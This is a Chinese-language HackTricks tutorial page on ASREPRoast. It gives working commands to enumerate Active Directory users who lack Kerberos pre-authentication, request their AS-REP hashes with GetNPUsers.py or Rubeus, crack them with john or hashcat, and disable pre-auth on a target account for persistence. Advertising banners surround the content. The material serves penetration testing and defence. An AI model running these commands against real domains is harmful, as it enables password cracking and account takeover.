6.7 KiB
ASREPRoast
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或 telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
HackenProof是所有加密漏洞赏金的家园。
无需等待即可获得奖励
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞经过验证后,您将获得奖励。
在web3渗透测试中获得经验
区块链协议和智能合约是新的互联网!在其兴起的日子里掌握web3安全。
成为web3黑客传奇
每次验证的漏洞都会获得声誉积分,并占据每周排行榜的榜首。
在HackenProof上注册开始从您的黑客攻击中获利!
{% embed url="https://hackenproof.com/register" %}
ASREPRoast
ASREPRoast攻击寻找不需要Kerberos预身份验证属性(DONT_REQ_PREAUTH_)**的用户。
这意味着任何人都可以代表这些用户向DC发送AS_REQ请求,并接收AS_REP消息。这种消息包含使用原始用户密钥(从其密码派生)加密的一段数据。然后,通过使用此消息,可以离线破解用户密码。
此外,执行此攻击不需要域帐户,只需要连接到DC。然而,使用域帐户可以使用LDAP查询来检索域中不需要Kerberos预身份验证的用户。否则必须猜测用户名。
枚举易受攻击的用户(需要域凭据)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
请求AS_REP消息
{% code title="使用Linux" %}
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% code title="使用Windows" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
{% endcode %}
{% hint style="warning" %} 使用Rubeus进行AS-REP Roasting将生成一个加密类型为0x17和预身份验证类型为0的4768。 {% endhint %}
破解
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
持久性
对于具有GenericAll权限(或具有写入属性的权限)的用户,强制preauth不是必需的:
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
参考资料
有关使用 Rubeus 和 Hashcat 进行 AS-REP Roasting 的更多信息,请参考 ired.team
HackenProof 是所有加密漏洞赏金的家园。
即刻获得奖励
HackenProof 的赏金只有在客户存入奖励预算后才会启动。在漏洞验证后,您将获得奖励。
在 web3 渗透测试中积累经验
区块链协议和智能合约是新的互联网!在其兴起之时掌握 web3 安全。
成为 web3 黑客传奇
每次验证的漏洞都会增加声誉点数,征服每周排行榜的顶端。
在 HackenProof 上注册 并从您的黑客攻击中获利!
{% embed url="https://hackenproof.com/register" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在一家网络安全公司工作吗?您想在 HackTricks 中看到您的公司广告吗?或者您想获得PEASS 的最新版本或下载 PDF 格式的 HackTricks?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获得官方 PEASS & HackTricks 商品
- 加入💬 Discord 群组 或 Telegram 群组,或在 Twitter 上关注我 🐦@carlospolopm。
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。